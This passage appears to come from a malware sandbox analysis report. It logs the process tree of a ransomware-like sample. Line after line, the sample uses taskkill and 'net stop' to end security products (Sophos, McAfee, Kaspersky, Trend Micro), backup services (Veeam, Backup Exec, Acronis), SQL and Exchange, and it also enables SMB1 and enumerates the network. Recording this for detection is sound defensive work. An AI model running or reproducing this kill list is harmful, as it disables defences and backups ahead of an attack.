C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM outlook.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msaccess.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM onenote.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" IM thunderbird.exe /F3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM zoolz.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM infopath.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocomm.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat64.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM excel.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM encsvc.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM steam.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c net view3⤵
-
C:\Windows\SysWOW64\net.exenet view4⤵
- Discovers systems in the same network
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol3⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EsgShKernel /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$TPSAMA /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ntrtscan /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ntrtscan /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EPUpdateService /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$TPS /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EPSecurityService /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDeviceMediaService /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos System Protection Service” /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos System Protection Service” /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PRACTICEMGT /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Safestore Service” /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Safestore Service” /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop audioendpointbuilder /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop audioendpointbuilder /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$ECWDB2 /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Message Router” /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Message Router” /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop unistoresvc_1af40a /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop unistoresvc_1af40a /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$BKUPEXEC /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ARSM /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ARSM /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos MCS Client” /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Client” /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msexchangeimap4 /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msexchangeimap4 /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “intel(r) proset monitoring service” /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$TPSAMA /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos MCS Agent” /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Agent” /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msexchangeadtopology /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msexchangeadtopology /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “aphidmonitorservice” /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “aphidmonitorservice” /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$TPS /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Zoolz 2 Service” /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Zoolz 2 Service” /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$TPSAMA /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Health Service” /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Health Service” /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeSRS /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop W3Svc /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop W3Svc /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$SYSTEM_BGC /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Veeam Backup Catalog Data Service” /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$TPS /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos File Scanner Service” /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos File Scanner Service” /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeSA /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop UI0Detect /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UI0Detect /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$SQL_2008 /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Symantec System Recovery” /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Symantec System Recovery” /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SYSTEM_BGC /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Device Control Service” /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Device Control Service” /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeMTA /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SstpSvc /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SstpSvc /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msftesql$PROD /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQLsafe Filter Service” /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “SQLsafe Filter Service” /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SQL_2008 /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SMTPSvc /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Clean Service” /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Clean Service” /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeMGMT /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop POP3Svc /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop POP3Svc /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer110 /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQLsafe Backup Service” /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “SQLsafe Backup Service” /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SamSs /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SamSs /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos AutoUpdate Service” /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeIS /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetMsmqActivator /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer100 /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQL Backups /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “SQL Backups /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Enterprise Client Service” /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Enterprise Client Service” /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EraserSvc11710 /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Agent” /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Agent” /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeES /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop IISAdmin /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop IISAdmin /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Acronis VSS Provider” /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Acronis VSS Provider” /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophos /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophos /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CAARCUpdateSvc /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CASAD2DWebSvc /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDiveciMediaService /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop vapiendpoint /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mssql$vim_sqlexp /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssql$vim_sqlexp /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop WRSVC /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLTELEMETRY$ECWDB2 /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKeyServiceHelper /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLTELEMETRY /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKeyScheduler /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLSERVERAGENT /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKey /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLSafeOLRService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop tmlisten /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLBrowser /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TmCCSF /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2012 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_update_64 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_update /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$TPSAMA /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_service /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$TPS /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_filter /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SYSTEM_BGC /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop svcGenericHost /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SQLEXPRESS /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SOPHOS /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SQL_2008 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophossps /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SntpService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SBSMONITORING /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SmcService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PROFXENGAGEMENT /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Smcinst /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PROD /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ShMonitor /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PRACTTICEMGT /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SepMasterService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PRACTTICEBGC /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SAVService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$ECWDB2 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SAVAdminService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$CXDB /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sacsvr /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$CITRIX_METAFRAME /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SOPHOS /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$BKUPEXEC /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sms_site_sql_backup /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfevtp /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RESvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop wbengine /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfemms /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SQL_2008 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop wbengine /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfefire /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop OracleClientCache80 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McTaskManager /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MySQL80 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamRESTSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McShield /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MySQL57 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeFrameworkMcAfeeFramework /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerOLAPService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamMountSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeFramework /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerADHelper100 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamHvIntegrationSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeEngineService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerADHelper /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamEnterpriseManagerSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MBEndpointAgent /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLSERVER /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploySvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MBAMService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$TPSAMA /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop masvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$TPS /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamCloudSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop macmnsvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamCatalogSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop klnagent /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamBrokerSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop kavfsslp /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamBackupSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop KAVFSGT /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLWriter /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop KAVFS /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop FA_Scheduler /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2012 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SDRSVC /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ESHASRV /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SYSTEM_BGC /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mozyprobackup /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ekrn /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EhttpSrv /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBFCService /y3⤵
-
